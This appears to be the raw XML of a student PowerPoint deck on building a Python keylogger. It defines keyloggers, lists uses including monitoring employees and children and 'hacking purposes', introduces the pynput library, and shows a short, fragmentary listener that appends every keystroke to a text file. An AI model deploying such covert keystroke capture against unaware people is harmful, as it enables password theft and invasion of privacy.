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35" r:id="rId5"/>
    <p:sldId id="2440" r:id="rId6"/>
    <p:sldId id="2443" r:id="rId7"/>
    <p:sldId id="2441" r:id="rId8"/>
    <p:sldId id="2442" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="2438" r:id="rId11"/>
    <p:sldId id="2439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DCF"/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584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of choosing this project, correct usage, how to detect, visions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,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8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FA026-31E0-4E1A-8013-1BFBB0CA5C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E59CAE-20C9-468B-97FC-E47F35A7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2E7274-B066-4654-B197-28A56A7B99B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3004404" y="2088225"/>
            <a:ext cx="5933872" cy="114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KEYLOGGER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A57C60-8934-471A-9819-C18A776F6F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328137" y="5705932"/>
            <a:ext cx="593387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kern="0" spc="0" dirty="0">
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	MORTAZA HASSANI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="0" spc="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A140A-16A9-4BFB-B246-9014791A12EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576293" y="3625404"/>
            <a:ext cx="303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PYTHON BASED PROJECT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9EA06-D6A5-44B4-A012-481517B54E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IS THE ACTION OF RECORDING THE KEYS STRUCK ON A KEYBOARD,  SO THAT PERSON USING THE KEYBOARD IS UNAWARE THAT THEIR ACTION ARE BEING MONITORED.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US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CAN BE RETRIEVED BY THE PERSON OPERATING LOGGING PROGRAM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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F34F8-F736-4B76-A757-2C5169F93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759351-6F3C-44F6-828B-BC051C03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037" y="365125"/>
            <a:ext cx="4031001" cy="172456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WHAT IS KEYLOGGER?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://www.huiyixitong.net/wp-content/uploads/2017/06/img1.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC9260E-E4F0-4313-80CA-15859DFCC7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77" y="2943974"/>
            <a:ext cx="4017962" cy="26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7D78F3-6D07-4119-94ED-C7E0CAF48711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="960059"/>
            <a:ext cx="9601196" cy="33189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8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E0D2-B92B-45E1-B56B-F548BC1B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&amp; DISADVANTAGES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363EB-35D6-4C0C-851F-3EB1F2AA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9DC9FD-F2DE-4629-B3A7-FF0B043F2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1827213"/>
            <a:ext cx="5157788" cy="4953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ADVANTAGES OF KEYLOGGER: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14AF20-EF36-43EC-9956-D020448A3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900" y="1827213"/>
            <a:ext cx="5183188" cy="495300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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DISADVANTAGES OF KEYLOGGER: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C9B131-7A06-4AF6-85CC-2D9A142E4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900" y="2341563"/>
            <a:ext cx="5157788" cy="3686175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT IS USED FOR SECURITY PURPOSE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT IS ALSO USED IN OFFICES TO MONITOR WHAT TYPES OF WORKS EMPLOYEES DO AND HOW MUCH TIME THEY CONSUME TO DO ANY TASK .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT ALSO HELPS US TO KNOW ABOUT THE ACTIVITY OF YOUR CHILDREN, WHAT ACTUALLY HE/SHE DOES IN IT . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FOR HACKING PURPOSES .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6B8D74-53BF-4D5A-B89B-650031FEB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900" y="2341563"/>
            <a:ext cx="5183188" cy="3686175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PRIVACY, PASSWORDS, CHAT, EMAILS …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KEYLOGGERS ARE A POPULAR FORM OF MALWARE BECAUSE THEY ALLOW CRIMINALS TO STEAL CREDIT CARD NUMBERS AND ANY OTHER SENSITIVE DATA.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139148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AF2F-ADEE-4F0B-8828-7387ECECF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341563"/>
            <a:ext cx="6096000" cy="343432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PYTHON IS AN INTEPRETED HIGH-LEVEL PROGRAMMING LANGUAGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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A90A3-49FF-4BAA-8E75-00900300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C0C9B4-D159-49AB-97D7-8A904D8A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3" y="0"/>
            <a:ext cx="11001375" cy="11890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PYTHON?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9C8091-9E84-45D5-A740-061AB8F229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14406" y="2341563"/>
            <a:ext cx="3686175" cy="3686175"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342372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07D1B-EF83-4EB1-BF25-81A39167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068" y="4198513"/>
            <a:ext cx="6210493" cy="230531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LIBRARY OF PYTHON ALLOWS USER TO CONTROL AND MONITOR INPUT DEVICES . WE CAN MONITOR THE FUNCTION OF MOUSE AND KEYBOARDAS WELL . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc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00D4B5-8D2D-410B-845F-D822EC8A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86" y="706013"/>
            <a:ext cx="5934075" cy="34925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WHAT IS PYNPUT?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Image result for PYNPUT PYTHON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89795E4C-360E-49CA-BA53-2CB9C382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0" y="1558344"/>
            <a:ext cx="5208788" cy="2929943"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 2192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3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593" y="24571"/>
            <a:ext cx="4365891" cy="1005767"/>
          </a:xfrm>
        </p:spPr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8373" y="759783"/>
            <a:ext cx="6024844" cy="5878133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pynput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import mouse, keyboard</a:t>
            </a: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keyboard_log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(key):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with open("keyboard.txt", "a+") as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keylog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if type(key) == keyboard._win32.KeyCode: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x =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key.char</a:t>
            </a:r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else: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x = ' \n\t' + str(key) + ' \n'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keylog.write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(str(x))</a:t>
            </a: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keyboard_start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with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keyboard.Listener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on_press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=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keyboard_log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as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lstn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lstn.join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kern="0" spc="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kern="0" spc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keyboard_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="0" spc="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Laptop Cafe" title="Laptop Cafe">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAD5614-7964-4802-90F4-35E99D2D1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5" t="74" r="357" b="15189"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-112462" y="1"/>
            <a:ext cx="12304462" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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4714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chemeClr val="bg2">
              <a:lumMod val="25000"/>
              <a:alpha val="74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DO CODING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31580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037137" y="3350839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MORTAZA HASSANI</a:t>
            </a:r>
          </a:p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FA19-BECE-0007</a:t>
            </a:r>
          </a:p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Versant.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="300" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>m.h@gmail.com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339</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>53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Gill Sans</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WHAT IS KEYLOGGER?</vt:lpstr>
      <vt:lpstr>ADVANTAGES &amp; DISADVANTAGES</vt:lpstr>
      <vt:lpstr>WHAT IS PYTHON?</vt:lpstr>
      <vt:lpstr>WHAT IS PYNPUT?</vt:lpstr>
      <vt:lpstr>CODING</vt:lpstr>
      <vt:lpstr>LET’S DO CODING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2020-01-04T05:18:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-14T05:47:55Z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